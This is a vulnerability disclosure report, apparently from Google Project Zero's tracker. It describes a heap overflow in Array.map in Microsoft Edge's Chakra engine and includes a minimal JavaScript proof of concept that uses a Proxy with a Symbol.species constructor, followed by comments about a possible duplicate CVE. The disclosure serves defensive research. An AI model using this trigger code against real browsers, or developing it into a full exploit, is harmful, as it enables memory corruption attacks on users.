|
|
Microsoft Edge: Heap Overflow in Array.map | |||||
| Project Member Reported by natashenka@google.com, Sep 1 2016 | Back to list | |||||
There is a heap overflow in Array.map in Chakra. In Js::JavascriptArray::MapHelper, if the array that is being mapped is a Proxy, ArraySpeciesCreate is used to create the array that the mapped values are copied into. They are then written to the array using DirectSetItemAt, even through there is no guarantee the array is a Var array. If it is actually an int array, it will be shorter than this function expects, causing a heap overflow. A minimal PoC is as follows:
var d = new Array(1,2,3);
class dummy{
constructor(){
alert("in constructor");
return d;
}
}
var handler = {
get: function(target, name){
if(name == "length"){
return 0x100;
}
return {[Symbol.species] : dummy};
},
has: function(target, name){
return true;
}
};
var p = new Proxy([], handler);
var a = new Array(1,2,3);
function test(){
return 0x777777777777;
}
var o = a.map.call(p, test);
A full PoC is attached.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Project Member
Comment 1
by
natashenka@google.com,
Sep 8 2016
,
Oct 11 2016
,
Oct 12 2016
,
Oct 19 2016
,
Dec 11 2016
Hi,I have a question. I think this issue is the same with CVE-2016-3377 which is fixed in Sep. Why this issue has a different CVE number and fixed in Oct again... Thanks for your help!
,
Dec 11 2016
I took a look at this in September, and from what I could tell they fixed a different vulnerability in Array.map than the one I reported.
,
Dec 12 2016
Hello,thank for your patient reply. Here is the diff and PoC about 3377 in September: https://github.com/Microsoft/ChakraCore/commit/24c4d7df8199b27d360323ce3be1d7959fd918eb#diff-49bb5a3c5aa249e3dcefd245e91df5f7 Could you mind to have a look,plz.. On the other hand ,I can't repo your PoC in the version between September to Oct.
,
Dec 15 2016
I checked with Microsoft, and they confirmed these are the same issue. |
||||||
| ► Sign in to add a comment | ||||||